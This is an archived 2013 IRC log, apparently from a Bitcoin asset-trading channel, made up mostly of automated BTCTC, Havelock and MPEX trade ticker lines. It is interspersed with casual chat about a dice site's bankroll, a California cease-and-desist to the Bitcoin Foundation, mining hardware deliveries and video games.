[TAT.VIRTUALMINE] 50 @ 0.004099 = 0.205 BTC [-] Jun 23 01:37:44 just-dice.com Jun 23 01:37:52 genius Jun 23 01:38:22 https://bitcointalk.org/index.php?topic=238680.0 Jun 23 01:38:23 wiw Jun 23 01:38:29 [PSA] Be careful with your new hardware. Criminals are watching. Jun 23 01:42:06 [BTCTC] [DMS.MINING] 1 @ 0.016486 BTC [+] Jun 23 01:42:55 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0041 BTC [+] Jun 23 01:46:52 [MPEX] [S.MPOE] 15501 @ 0.00077274 = 11.9782 BTC [-] Jun 23 01:46:54 [MPEX] [S.MPOE] 7699 @ 0.0007725 = 5.9475 BTC [-] **** BEGIN LOGGING AT Sun Jun 23 03:02:36 2013 Jun 23 03:04:05 [BTCTC] [DMS.MINING] 107 @ 0.0155 = 1.6585 BTC [-] Jun 23 03:04:07 [BTCTC] [DMS.MINING] 100 @ 0.0155 = 1.55 BTC [-] Jun 23 03:07:09 [BTCTC] [DMS.MINING] 1 @ 0.016485 BTC [+] Jun 23 03:12:27 03:11 (472) so how's the taste of success dooglus ? Jun 23 03:12:32 03:12 (1) mp: it tastes a lot like fear Jun 23 03:12:33 he knows. Jun 23 03:13:51 ASICMINER direct shares are about that high too. And yes, ridiculously high. Jun 23 03:15:02 [HAVELOCK] [ASICM] 1 @ 0.03149498 BTC [+] Jun 23 03:19:34 [BTCTC] [RSM] 10 @ 0.025999 = 0.26 BTC [+] Jun 23 03:23:46 [MPEX] [S.MPOE] 3564 @ 0.00077447 = 2.7602 BTC [+] Jun 23 03:23:49 [MPEX] [S.MPOE] 5987 @ 0.00077454 = 4.6372 BTC [+] Jun 23 03:23:51 [MPEX] [S.MPOE] 5450 @ 0.00077535 = 4.2257 BTC [+] Jun 23 03:40:19 In 2011, the Internal Revenue Service sent 23,994 tax refunds worth a combined $46,378,040 to “unauthorized” alien workers who all used the same address in Atlanta, Ga Jun 23 03:44:29 interesting.. they must have a quite big house than. Jun 23 03:45:20 lol **** BEGIN LOGGING AT Sun Jun 23 17:30:37 2013 Jun 23 17:31:12 [BTCTC] [ASICMINER-PT] 8 @ 3.25 = 26 BTC [+] Jun 23 17:36:32 [BTCTC] [TAT.ASICMINER] 3 @ 0.0323 = 0.0969 BTC [-] Jun 23 17:45:30 [BTCTC] [DMS.MINING] 20 @ 0.014986 = 0.2997 BTC [+] Jun 23 17:48:01 [BTCTC] [ASICMINER-PT] 1 @ 3.25 BTC [+] Jun 23 17:51:08 [MPEX] [S.MPOE] 1100 @ 0.00079 = 0.869 BTC [+] Jun 23 17:56:02 [BTCTC] [CRYPTO-TRADE] 5 @ 0.199599 = 0.998 BTC [-] Jun 23 17:56:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.0324 BTC [+] Jun 23 17:58:17 [BTCTC] [ASICMINER-PT] 1 @ 3.248 BTC [-] Jun 23 17:58:19 [BTCTC] [ASICMINER-PT] 12 @ 3.25 = 39 BTC [+] Jun 23 17:59:03 [HAVELOCK] [ASICM] 1 @ 0.03185 BTC [+] Jun 23 18:06:14 [BTCTC] [COGNITIVE] 4 @ 0.35 = 1.4 BTC [+] Jun 23 18:06:15 [BTCTC] [COGNITIVE] 2 @ 0.358 = 0.716 BTC [+] Jun 23 18:06:17 [BTCTC] [COGNITIVE] 4 @ 0.358 = 1.432 BTC [+] Jun 23 18:06:18 [BTCTC] [COGNITIVE] 5 @ 0.369 = 1.845 BTC [+] Jun 23 18:07:18 [BTCTC] [COGNITIVE] 3 @ 0.37 = 1.11 BTC [+] Jun 23 18:07:19 [BTCTC] [COGNITIVE] 10 @ 0.37 = 3.7 BTC [+] Jun 23 18:08:15 [BTCTC] [DMS.MINING] 1 @ 0.014986 BTC [+] Jun 23 18:08:49 [BTCTC] [ASICMINER-PT] 1 @ 3.221002 BTC [-] Jun 23 18:11:55 [BTCTC] [ASICMINER-PT] 1 @ 3.259999 BTC [+] Jun 23 18:13:06 [BTCTC] [B.YABMC] 3 @ 0.008 = 0.024 BTC [+] Jun 23 18:18:53 [BTCTC] [TAT.ASICMINER] 10 @ 0.032001 = 0.32 BTC [-] Jun 23 18:19:00 [BTCTC] [S.DICE-PT] 3 @ 0.002359 = 0.0071 BTC [+] Jun 23 18:25:22 [BTCTC] [GSDPT] 10 @ 0.00215 = 0.0215 BTC [-] Jun 23 18:25:39 [HAVELOCK] [HIM] 1 @ 0.277757 BTC [+] Jun 23 18:26:53 [BTCTC] [B.YABMC] 50 @ 0.00553 = 0.2765 BTC [-] Jun 23 18:28:32 [HAVELOCK] [ASICM] 9 @ 0.03185 = 0.2867 BTC [+] Jun 23 18:33:24 [BTCTC] [TAT.ASICMINER] 35 @ 0.032001 = 1.12 BTC [-] Jun 23 18:34:12 [BTCTC] [BASIC-MINING] 1 @ 1.099999 BTC [+] Jun 23 18:35:13 this is quite interesting http://www.youtube.com/watch?v=3-oySaDJHoI Jun 23 18:35:28 [BTCTC] [TAT.ASICMINER] 10 @ 0.032399 = 0.324 BTC [+] Jun 23 18:36:43 [BTCTC] [ASICMINER-PT] 1 @ 3.256 BTC [-] Jun 23 18:37:02 [BTCTC] [ASICMINER-PT] 1 @ 3.257 BTC [+] Jun 23 18:37:16 [BTCTC] [TAT.ASICMINER] 144 @ 0.0324 = 4.6656 BTC [+] Jun 23 18:37:17 [BTCTC] [ASICMINER-PT] 1 @ 3.2578 BTC [+] Jun 23 18:37:18 yaya. "political zone". Jun 23 18:37:30 because some kid says so. Jun 23 18:37:35 [BTCTC] [ASICMINER-PT] 1 @ 3.2579 BTC [+] Jun 23 18:37:47 [BTCTC] [DMS.MINING] 41 @ 0.014986 = 0.6144 BTC [+] Jun 23 18:37:49 [BTCTC] [DMS.MINING] 1 @ 0.014987 BTC [+] Jun 23 18:37:50 [BTCTC] [DMS.MINING] 100 @ 0.014987 = 1.4987 BTC [+] Jun 23 18:37:51 [BTCTC] [DMS.MINING] 58 @ 0.014987 = 0.8692 BTC [+] Jun 23 18:37:53 [BTCTC] [ASICMINER-PT] 2 @ 3.258 = 6.516 BTC [+] Jun 23 18:38:19 dunno hes got some good points Jun 23 18:38:28 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.004379 = 0.0307 BTC [+] Jun 23 18:39:14 [BTCTC] [ASICMINER-PT] 5 @ 3.2589 = 16.2945 BTC [+] Jun 23 18:39:16 [BTCTC] [ASICMINER-PT] 1 @ 3.259 BTC [+] Jun 23 18:39:23 like which ? Jun 23 18:39:32 the palestinians have gone through 50 years or armed conflicty Jun 23 18:39:35 like 3 intifadas Jun 23 18:39:41 they still don't have jerusalem. Jun 23 18:39:55 how is he going to finance the palestinian liberation front, this guy ? Jun 23 18:40:14 lol Jun 23 18:40:24 [BTCTC] [DMS.MINING] 15 @ 0.014111 = 0.2117 BTC [-] Jun 23 18:40:25 [BTCTC] [DMS.MINING] 36 @ 0.01411 = 0.508 BTC [-] Jun 23 18:40:26 [BTCTC] [DMS.MINING] 24 @ 0.01411 = 0.3386 BTC [-] Jun 23 18:40:28 [BTCTC] [DMS.MINING] 38 @ 0.013418 = 0.5099 BTC [-] Jun 23 18:40:29 [BTCTC] [DMS.MINING] 114 @ 0.013417 = 1.5295 BTC [-] Jun 23 18:43:16 cmon Jun 23 18:43:20 its like aoe Jun 23 18:45:50 kako, it's interesting, indeed. Not sure it's feasible, but interesting nevertheless. Jun 23 18:48:09 [BTCTC] [CRYPTO-TRADE] 21 @ 0.198001 = 4.158 BTC [-] Jun 23 18:51:14 [BTCTC] [ASICMINER-PT] 2 @ 3.26 = 6.52 BTC [+] Jun 23 18:54:12 [BTCTC] [ASICMINER-PT] 2 @ 3.262 = 6.524 BTC [+] Jun 23 18:54:48 [BTCTC] [ASICMINER-PT] 1 @ 3.262 BTC [+] Jun 23 18:55:16 sorry, what's aoe? Jun 23 18:55:45 [BTCTC] [ASICMINER-PT] 1 @ 3.263 BTC [+] Jun 23 18:56:40 [BTCTC] [ASICMINER-PT] 1 @ 3.264 BTC [+] Jun 23 18:56:56 age of empires Jun 23 18:57:16 [BTCTC] [B.YABMC] 80 @ 0.005525 = 0.442 BTC [-] Jun 23 18:57:16 [BTCTC] [B.YABMC] 20 @ 0.005521 = 0.1104 BTC [-] Jun 23 18:57:19 [BTCTC] [B.YABMC] 80 @ 0.005511 = 0.4409 BTC [-] Jun 23 18:57:19 [BTCTC] [B.YABMC] 1 @ 0.0052 BTC [-] Jun 23 18:57:20 [BTCTC] [B.YABMC] 30 @ 0.005 = 0.15 BTC [-] Jun 23 18:57:22 [BTCTC] [B.YABMC] 50 @ 0.0045 = 0.225 BTC [-] Jun 23 18:57:23 [BTCTC] [B.YABMC] 200 @ 0.0042 = 0.84 BTC [-] Jun 23 18:57:25 [BTCTC] [B.YABMC] 10 @ 0.004193 = 0.0419 BTC [-] Jun 23 18:57:26 [BTCTC] [B.YABMC] 5 @ 0.004191 = 0.021 BTC [-] Jun 23 18:57:27 [BTCTC] [B.YABMC] 150 @ 0.0041 = 0.615 BTC [-] Jun 23 18:57:29 [BTCTC] [ASICMINER-PT] 2 @ 3.265 = 6.53 BTC [+] Jun 23 18:57:29 area of effect Jun 23 18:57:30 [BTCTC] [B.YABMC] 174 @ 0.004 = 0.696 BTC [-] Jun 23 18:57:31 if you WoW Jun 23 18:57:54 [HAVELOCK] [ASICM] 29 @ 0.03199899 = 0.928 BTC [+] Jun 23 18:58:05 never touched wow Jun 23 18:58:40 area of effect was my first thought, but i didn't catch the context Jun 23 18:59:18 thats just insulting Jun 23 18:59:40 ? Jun 23 19:00:03 wow is so much better than some old school simulation game lol Jun 23 19:00:16 :) Jun 23 19:00:19 simulation? Jun 23 19:00:26 this aint flying planes Jun 23 19:00:47 its a strategy game Jun 23 19:01:19 [BTCTC] [RSM] 11 @ 0.0249 = 0.2739 BTC [-] Jun 23 19:01:21 [BTCTC] [RSM] 134 @ 0.024999 = 3.3499 BTC [+] Jun 23 19:01:22 well, okay :) Jun 23 19:02:18 and wow Jun 23 19:02:25 well i never looked seriously into that Jun 23 19:02:27 cause of all the hype Jun 23 19:04:39 it has some addicting mechanics and was fun (at least for me) some time ago :) Jun 23 19:04:44 furuknap play this at the same time as listening to that talk http://www.youtube.com/watch?v=PSE077G5Mfc Jun 23 19:05:14 and sorry for insulting you with the aoe statement, wasn't intended :p Jun 23 19:05:21 i was joking Jun 23 19:05:36 k :) Jun 23 19:05:40 you must be new here? :) Jun 23 19:05:45 [BTCTC] [TAT.ASICMINER] 25 @ 0.0325 = 0.8125 BTC [+] Jun 23 19:06:13 Hah, I have that soundtrack on my playlist already :-) Jun 23 19:06:22 lol Jun 23 19:07:20 What can I do to get more votes for my new asset on BTCT? I'm one Yes-vote short, but I'm more concerned that I have received very few votes at all (one No, one Abstain, four Yes). Jun 23 19:09:31 [HAVELOCK] [ASICM] 21 @ 0.03199899 = 0.672 BTC [+] Jun 23 19:09:42 [BTCTC] [DMS.MINING] 1 @ 0.014979 BTC [+] Jun 23 19:10:19 there arent a lot of voters Jun 23 19:10:33 maybe 8 total Jun 23 19:13:25 [HAVELOCK] [ASICM] 3 @ 0.0315 = 0.0945 BTC [-] Jun 23 19:17:46 That's what I was thinking too. The system seems somewhat broken, at least with the 5 Yes-vote minimum. Jun 23 19:18:06 [MPEX] [S.MPOE] 4750 @ 0.00078924 = 3.7489 BTC [-] Jun 23 19:19:06 http://www.forbes.com/sites/jonmatonis/2013/06/23/bitcoin-foundation-receives-cease-and-desist-order-from-california/ Jun 23 19:19:08 _lol_ Jun 23 19:19:10 Bitcoin Foundation Receives Cease And Desist Order From California - Forbes Jun 23 19:19:13 [BTCTC] [DMS.MINING] 19 @ 0.013418 = 0.2549 BTC [-] Jun 23 19:19:15 [BTCTC] [DMS.MINING] 21 @ 0.013417 = 0.2818 BTC [-] Jun 23 19:19:23 good luck califnornia, the foundation has nothing to do with bitcoin and doesnt employ satoshi Jun 23 19:19:26 https://bitcointalk.org/index.php?topic=241302.msg2558169#msg2558169 Jun 23 19:19:32 2013-06-23 Forbes - Bitcoin Foundation Receives Cease And Desist Order From Ca Jun 23 19:19:59 [BTCTC] [DMS.MINING] 9 @ 0.013417 = 0.1208 BTC [-] Jun 23 19:20:01 [BTCTC] [DMS.MINING] 10 @ 0.013417 = 0.1342 BTC [-] Jun 23 19:21:29 [BTCTC] [DMS.MINING] 1 @ 0.013416 BTC [-] Jun 23 19:21:31 [BTCTC] [DMS.MINING] 1 @ 0.0133 BTC [-] Jun 23 19:21:32 [BTCTC] [DMS.MINING] 2 @ 0.013017 = 0.026 BTC [-] Jun 23 19:21:34 [BTCTC] [DMS.MINING] 50 @ 0.013 = 0.65 BTC [-] Jun 23 19:21:35 [BTCTC] [DMS.MINING] 3 @ 0.013 = 0.039 BTC [-] Jun 23 19:23:22 [BTCTC] [TAT.ASICMINER] 3 @ 0.0296 = 0.0888 BTC [-] Jun 23 19:23:39 [HAVELOCK] [ASICM] 2 @ 0.03199999 = 0.064 BTC [+] Jun 23 19:26:08 [BTCTC] [DMS.MINING] 5 @ 0.0131 = 0.0655 BTC [+] Jun 23 19:26:10 [BTCTC] [DMS.MINING] 17 @ 0.013 = 0.221 BTC [-] Jun 23 19:26:33 [BTCTC] [B.YABMC] 1 @ 0.00499 BTC [+] Jun 23 19:27:45 > BitCoin Foundation Jun 23 19:28:04 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004375 BTC [-] Jun 23 19:28:12 http://trilema.com/2013/the-cold-war-experts-over-here-are-having-a-ball-these-days/ Jun 23 19:28:15 The Cold War experts over here are having a ball these days. pe Trilema - Un blog de Mircea Popescu. Jun 23 19:28:46 you don;t say. Jun 23 19:31:55 o forgot to ping asciilifeform Jun 23 19:34:24 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004374 = 0.0087 BTC [-] Jun 23 19:34:43 [BTCTC] [ASICMINER-PT] 2 @ 3.264 = 6.528 BTC [-] Jun 23 19:35:15 [BTCTC] [S.DICE-PT] 3 @ 0.002359 = 0.0071 BTC [+] Jun 23 19:35:17 [BTCTC] [S.DICE-PT] 21 @ 0.002358 = 0.0495 BTC [-] Jun 23 19:35:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.032899 BTC [+] Jun 23 19:38:04 next 30 seconds lol http://www.youtube.com/watch?feature=player_detailpage&v=3-oySaDJHoI#t=1111s Jun 23 19:38:59 [BTCTC] [DMS.MINING] 5 @ 0.0149 = 0.0745 BTC [+] Jun 23 19:39:57 [BTCTC] [DMS.MINING] 3 @ 0.014966 = 0.0449 BTC [+] Jun 23 19:41:07 [MPEX] [S.DICE] 185000 @ 0.002 = 370 BTC [-] Jun 23 19:46:39 [BTCTC] [TAT.ASICMINER] 34 @ 0.032899 = 1.1186 BTC [+] Jun 23 19:47:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.03295 BTC [+] Jun 23 19:47:36 [BTCTC] [B.YABMC] 43 @ 0.00465 = 0.2 BTC [-] Jun 23 19:47:38 [BTCTC] [B.YABMC] 1 @ 0.00446 BTC [-] Jun 23 19:47:39 [BTCTC] [B.YABMC] 53 @ 0.004008 = 0.2124 BTC [-] Jun 23 19:47:40 [BTCTC] [B.YABMC] 1 @ 0.004007 BTC [-] Jun 23 19:47:42 [BTCTC] [B.YABMC] 2 @ 0.004005 = 0.008 BTC [-] Jun 23 19:49:22 [BTCTC] [ASICMINER-PT] 2 @ 3.264 = 6.528 BTC [-] Jun 23 19:50:33 [BTCTC] [TAT.ASICMINER] 3 @ 0.03295 = 0.0989 BTC [+] Jun 23 19:50:50 [HAVELOCK] [ASICM] 9 @ 0.03199999 = 0.288 BTC [+] Jun 23 19:53:03 https://bitcointalk.org/index.php?topic=241294.msg2558043#msg2558043 Jun 23 19:53:04 lol win. Jun 23 19:53:07 e-Shills for hire - Expert ☛AUCTION SHILLS☚ for your growing business! Jun 23 19:53:19 hm so you changed your mind on just dice mircea_popescu? Jun 23 19:53:27 [BTCTC] [DMS.MINING] 17 @ 0.014966 = 0.2544 BTC [+] Jun 23 19:53:29 [BTCTC] [DMS.MINING] 10 @ 0.014966 = 0.1497 BTC [+] Jun 23 19:53:30 [BTCTC] [DMS.MINING] 2 @ 0.014967 = 0.0299 BTC [+] Jun 23 19:53:31 [BTCTC] [DMS.MINING] 287 @ 0.014975 = 4.2978 BTC [+] Jun 23 19:53:32 [BTCTC] [DMS.MINING] 30 @ 0.014976 = 0.4493 BTC [+] Jun 23 19:53:34 [BTCTC] [DMS.MINING] 17 @ 0.014977 = 0.2546 BTC [+] Jun 23 19:53:35 [BTCTC] [DMS.MINING] 337 @ 0.01498 = 5.0483 BTC [+] Jun 23 19:54:30 kakobrekla what was my mind ? Jun 23 19:56:04 [BTCTC] [CRYPTO-TRADE] 48 @ 0.199599 = 9.5808 BTC [+] Jun 23 19:56:40 http://log.bitcoin-assets.com/?date=21-06-2013#93285 Jun 23 19:56:46 #bitcoin-assets log Jun 23 19:57:20 no mention of that in the trilema article Jun 23 19:57:42 a, no. Jun 23 19:58:30 it's just that i invested a little, which solves his problem. Jun 23 19:58:30 hm? Jun 23 19:59:31 it's a big problem if he's backed by 1k gamblers with 1 btc each. Jun 23 19:59:52 [MPEX] [S.MPOE] 3700 @ 0.00078924 = 2.9202 BTC [-] Jun 23 19:59:52 if he's backed by 5k gamblers with 1k btc each and two actual investors with 3k btc each it's not (nearly) as much of a problem Jun 23 19:59:54 [MPEX] [S.MPOE] 5229 @ 0.00078912 = 4.1263 BTC [-] Jun 23 20:00:05 [MPEX] [S.MPOE] 2671 @ 0.0007883 = 2.1055 BTC [-] Jun 23 20:00:13 by 5k gamblers with 1* btc each i mean Jun 23 20:01:05 [BTCTC] [ASICMINER-PT] 1 @ 3.264 BTC [-] Jun 23 20:01:38 (actually my investment illustrated the problem, as a bunch of people withdrew and gambled on the spot. Jun 23 20:01:54 site took a 40% dip of its gains yest as a result. it's back by now tho.) Jun 23 20:04:40 [BTCTC] [TAT.VIRTUALMINE] 255 @ 0.004367 = 1.1136 BTC [-] Jun 23 20:05:46 hm Jun 23 20:06:14 its now up more than twice ev no? Jun 23 20:06:28 5k wagered Jun 23 20:06:31 site up 116 Jun 23 20:06:36 1% edge? Jun 23 20:06:39 yeah. Jun 23 20:06:48 it was like 90, i went in almost doubled its capital Jun 23 20:06:59 ppl started gambling, it dipped to like +30ish Jun 23 20:07:03 then it recovered slowly. Jun 23 20:07:22 hm Jun 23 20:07:34 it has a lot of variance because edge is small. Jun 23 20:12:31 [BTCTC] [ASICMINER-PT] 2 @ 3.264 = 6.528 BTC [-] Jun 23 20:15:13 [BTCTC] [ASICMINER-PT] 2 @ 3.265 = 6.53 BTC [+] Jun 23 20:19:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.03295 = 0.0659 BTC [+] Jun 23 20:25:17 [BTCTC] [TAT.ASICMINER] 11 @ 0.03295 = 0.3625 BTC [+] Jun 23 20:27:15 you're long the baltic dry, mircea_popescu? Jun 23 20:28:11 nope. Jun 23 20:28:18 i was short at some point, but years ago Jun 23 20:29:03 ah, so the boatload of popcorn isn't talking your book :> Jun 23 20:29:22 well see, the bdi is mileage. Jun 23 20:29:26 i just storage. Jun 23 20:29:40 http://www.forbes.com/sites/jonmatonis/2013/06/23/bitcoin-foundation-receives-cease-and-desist-order-from-california/ Jun 23 20:29:42 Bitcoin Foundation Receives Cease And Desist Order From California - Forbes Jun 23 20:29:44 wtf?! Jun 23 20:29:52 either wtf or lol Jun 23 20:30:00 im with the lol. Jun 23 20:30:16 [BTCTC] [ASICMINER-PT] 1 @ 3.265 BTC [+] Jun 23 20:30:25 california is rather lol anyway Jun 23 20:30:41 ayway, that stupidity had to be disbanded sooner or later so Jun 23 20:32:59 [BTCTC] [DMS.SELLING] 2 @ 0.040997 = 0.082 BTC [+] Jun 23 20:33:01 [BTCTC] [DMS.SELLING] 25 @ 0.040999 = 1.025 BTC [+] Jun 23 20:33:02 [BTCTC] [DMS.SELLING] 23 @ 0.041 = 0.943 BTC [+] Jun 23 20:34:25 i solicit the wisdom and netknowledge of the chan : Jun 23 20:34:26 gmaxwell reasonably suggests that C&D to be an offshoot of aaron greenspan's interation with california Jun 23 20:34:47 https://bitcointalk.org/index.php?topic=239874 Jun 23 20:34:50 is this pietilla ? Jun 23 20:34:51 s/interation/interaction/ Jun 23 20:34:52 [ANN]BitRecruiter -Epic Talent Acquisition for Cryptocurrency Enterprise Demands Jun 23 20:35:54 [BTCTC] [DMS.PURCHASE] 2 @ 0.054062 = 0.1081 BTC [-] Jun 23 20:37:03 >Yes am holding at godads instant until I have time to link up my dreamweaver and more importantly cloudflare. Jun 23 20:37:03 lol Jun 23 20:37:23 not sure if trolling Jun 23 20:40:02 lol @ cloudfail Jun 23 20:42:59 [HAVELOCK] [ASICM] 7 @ 0.03125001 = 0.2188 BTC [-] Jun 23 20:43:01 [HAVELOCK] [ASICM] 1 @ 0.03125 BTC [-] Jun 23 20:43:02 [HAVELOCK] [ASICM] 157 @ 0.03125 = 4.9063 BTC [-] Jun 23 20:43:03 [HAVELOCK] [ASICM] 111 @ 0.0312 = 3.4632 BTC [-] Jun 23 20:43:04 [HAVELOCK] [ASICM] 5 @ 0.0311005 = 0.1555 BTC [-] Jun 23 20:43:05 [HAVELOCK] [ASICM] 7 @ 0.0311003 = 0.2177 BTC [-] Jun 23 20:43:07 [HAVELOCK] [ASICM] 69 @ 0.0311001 = 2.1459 BTC [-] Jun 23 20:43:08 [HAVELOCK] [ASICM] 3 @ 0.03110002 = 0.0933 BTC [-] Jun 23 20:43:08 [HAVELOCK] [ASICM] 250 @ 0.0311 = 7.775 BTC [-] Jun 23 20:43:09 [HAVELOCK] [ASICM] 8 @ 0.03100001 = 0.248 BTC [-] Jun 23 20:43:10 [HAVELOCK] [ASICM] 75 @ 0.031 = 2.325 BTC [-] Jun 23 20:43:11 [HAVELOCK] [ASICM] 200 @ 0.031 = 6.2 BTC [-] Jun 23 20:43:12 [HAVELOCK] [ASICM] 315 @ 0.030985 = 9.7603 BTC [-] Jun 23 20:43:13 [HAVELOCK] [ASICM] 5 @ 0.03051001 = 0.1526 BTC [-] Jun 23 20:43:14 [HAVELOCK] [ASICM] 1 @ 0.03025435 BTC [-] Jun 23 20:43:15 [HAVELOCK] [ASICM] 1 @ 0.03025001 BTC [-] Jun 23 20:43:16 [HAVELOCK] [ASICM] 189 @ 0.0301 = 5.6889 BTC [-] Jun 23 20:43:17 [HAVELOCK] [ASICM] 10 @ 0.03 = 0.3 BTC [-] Jun 23 20:45:55 [BTCTC] [ASICMINER-PT] 1 @ 3.278 BTC [+] Jun 23 20:45:58 [BTCTC] [ASICMINER-PT] 1 @ 3.279 BTC [+] Jun 23 20:46:01 [BTCTC] [ASICMINER-PT] 1 @ 3.28 BTC [+] Jun 23 20:46:04 [BTCTC] [ASICMINER-PT] 2 @ 3.29 = 6.58 BTC [+] Jun 23 20:46:06 [BTCTC] [ASICMINER-PT] 1 @ 3.29 BTC [+] Jun 23 20:46:07 [BTCTC] [ASICMINER-PT] 1 @ 3.295 BTC [+] Jun 23 20:46:09 [BTCTC] [ASICMINER-PT] 1 @ 3.297 BTC [+] Jun 23 20:46:10 [BTCTC] [ASICMINER-PT] 1 @ 3.298 BTC [+] Jun 23 20:46:12 [BTCTC] [ASICMINER-PT] 1 @ 3.2989 BTC [+] Jun 23 20:46:13 [BTCTC] [ASICMINER-PT] 2 @ 3.299 = 6.598 BTC [+] Jun 23 20:46:14 [BTCTC] [ASICMINER-PT] 2 @ 3.3 = 6.6 BTC [+] Jun 23 20:46:17 [BTCTC] [ASICMINER-PT] 1 @ 3.33 BTC [+] Jun 23 20:54:59 [BTCTC] [DMS.MINING] 3 @ 0.014966 = 0.0449 BTC [-] Jun 23 20:55:42 [BTCTC] [DMS.SELLING] 1 @ 0.041 BTC [+] Jun 23 20:56:10 [BTCTC] [B.YABMC] 62 @ 0.004006 = 0.2484 BTC [+] Jun 23 20:56:12 [BTCTC] [B.YABMC] 80 @ 0.004005 = 0.3204 BTC [-] Jun 23 20:56:13 [BTCTC] [B.YABMC] 8 @ 0.004 = 0.032 BTC [-] Jun 23 20:57:51 [BTCTC] [TAT.ASICMINER] 18 @ 0.03295 = 0.5931 BTC [+] Jun 23 20:57:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.032999 BTC [+] Jun 23 20:57:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.032999 = 0.066 BTC [+] Jun 23 20:57:56 [BTCTC] [TAT.ASICMINER] 5 @ 0.032999 = 0.165 BTC [+] Jun 23 20:57:58 [BTCTC] [TAT.ASICMINER] 31 @ 0.032999 = 1.023 BTC [+] Jun 23 21:02:46 [BTCTC] [COGNITIVE] 1 @ 0.331001 BTC [-] Jun 23 21:06:01 [BTCTC] [DMS.MINING] 15 @ 0.014966 = 0.2245 BTC [-] Jun 23 21:06:03 [BTCTC] [DMS.MINING] 1 @ 0.014967 BTC [+] Jun 23 21:06:04 [BTCTC] [DMS.MINING] 151 @ 0.014979 = 2.2618 BTC [+] Jun 23 21:06:05 [BTCTC] [DMS.MINING] 162 @ 0.01498 = 2.4268 BTC [+] Jun 23 21:06:06 [BTCTC] [DMS.MINING] 242 @ 0.014987 = 3.6269 BTC [+] Jun 23 21:06:07 [BTCTC] [DMS.MINING] 20 @ 0.01499 = 0.2998 BTC [+] Jun 23 21:06:08 [BTCTC] [DMS.MINING] 22 @ 0.014994 = 0.3299 BTC [+] Jun 23 21:06:09 [BTCTC] [DMS.MINING] 20 @ 0.014999 = 0.3 BTC [+] Jun 23 21:06:10 [BTCTC] [DMS.MINING] 50 @ 0.0155 = 0.775 BTC [+] Jun 23 21:06:11 [BTCTC] [DMS.MINING] 635 @ 0.01605 = 10.1918 BTC [+] Jun 23 21:06:13 [BTCTC] [DMS.MINING] 25 @ 0.01605 = 0.4013 BTC [+] Jun 23 21:06:14 [BTCTC] [DMS.MINING] 11 @ 0.01647 = 0.1812 BTC [+] Jun 23 21:06:15 [BTCTC] [DMS.MINING] 60 @ 0.016475 = 0.9885 BTC [+] Jun 23 21:06:15 [BTCTC] [DMS.MINING] 11 @ 0.016479 = 0.1813 BTC [+] Jun 23 21:06:16 [BTCTC] [DMS.MINING] 30 @ 0.016484 = 0.4945 BTC [+] Jun 23 21:06:17 [BTCTC] [DMS.MINING] 50 @ 0.017 = 0.85 BTC [+] Jun 23 21:06:18 [BTCTC] [DMS.MINING] 6 @ 0.017 = 0.102 BTC [+] Jun 23 21:06:19 [BTCTC] [DMS.MINING] 16 @ 0.0173 = 0.2768 BTC [+] Jun 23 21:06:20 [BTCTC] [DMS.MINING] 53 @ 0.01799 = 0.9535 BTC [+] Jun 23 21:06:21 [BTCTC] [DMS.MINING] 326 @ 0.018 = 5.868 BTC [+] Jun 23 21:06:22 [BTCTC] [DMS.MINING] 1 @ 0.018 BTC [+] Jun 23 21:06:23 [BTCTC] [DMS.MINING] 22 @ 0.018399 = 0.4048 BTC [+] Jun 23 21:06:23 [BTCTC] [DMS.MINING] 1 @ 0.0188 BTC [+] Jun 23 21:06:25 [BTCTC] [DMS.MINING] 10 @ 0.018989 = 0.1899 BTC [+] Jun 23 21:06:25 [BTCTC] [DMS.MINING] 50 @ 0.0195 = 0.975 BTC [+] Jun 23 21:06:26 [BTCTC] [DMS.MINING] 63 @ 0.0195 = 1.2285 BTC [+] Jun 23 21:06:27 [BTCTC] [DMS.MINING] 120 @ 0.02 = 2.4 BTC [+] Jun 23 21:06:28 [BTCTC] [DMS.MINING] 5 @ 0.02 = 0.1 BTC [+] Jun 23 21:07:59 [MPEX] [S.MPOE] 1000 @ 0.00079 = 0.79 BTC [+] Jun 23 21:09:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.032999 BTC [+] Jun 23 21:11:01 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1996 = 0.3992 BTC [+] Jun 23 21:15:05 [BTCTC] [DMS.MINING] 1 @ 0.01321 BTC [-] Jun 23 21:19:34 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004347 BTC [-] Jun 23 21:21:05 [HAVELOCK] [ASICM] 6 @ 0.03 = 0.18 BTC [-] Jun 23 21:21:18 [HAVELOCK] [ASICM] 11 @ 0.0299 = 0.3289 BTC [-] Jun 23 21:21:32 [BTCTC] [DMS.MINING] 1 @ 0.02038 BTC [+] Jun 23 21:21:36 [HAVELOCK] [ASICM] 1 @ 0.02981 BTC [-] Jun 23 21:22:12 [BTCTC] [DMS.PURCHASE] 15 @ 0.054062 = 0.8109 BTC [-] Jun 23 21:23:13 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004347 = 0.0087 BTC [-] Jun 23 21:23:19 [BTCTC] [COGNITIVE] 2 @ 0.331 = 0.662 BTC [-] Jun 23 21:23:31 [BTCTC] [COGNITIVE] 10 @ 0.32 = 3.2 BTC [-] Jun 23 21:24:39 is this one of the first delivered? https://forums.butterflylabs.com/blogs/luke-jr/203-minirig-here.html#comments Jun 23 21:25:22 well to their dev Jun 23 21:25:25 or whatever Jun 23 21:25:42 ya wasn't that the contentious "delivery" that sunk betsofbitco,in ? Jun 23 21:26:06 this is fresh stuff afaik Jun 23 21:26:24 link from the german "fuck you BFL" thread Jun 23 21:26:56 o right 6/22 Jun 23 21:27:42 The power supplies (EVGA 1500W) also created havoc interfering with the neutral on the power line. This disrupted X10 communication significantly enough that the pool overflowed because the system controlling it was unable to turn off the pump. Jun 23 21:27:57 seems fcc certs aren't a waste these days :D Jun 23 21:28:10 :) Jun 23 21:29:56 [BTCTC] [DMS.PURCHASE] 1 @ 0.054062 BTC [-] Jun 23 21:33:26 [BTCTC] [B.YABMC] 1 @ 0.00599 BTC [+] Jun 23 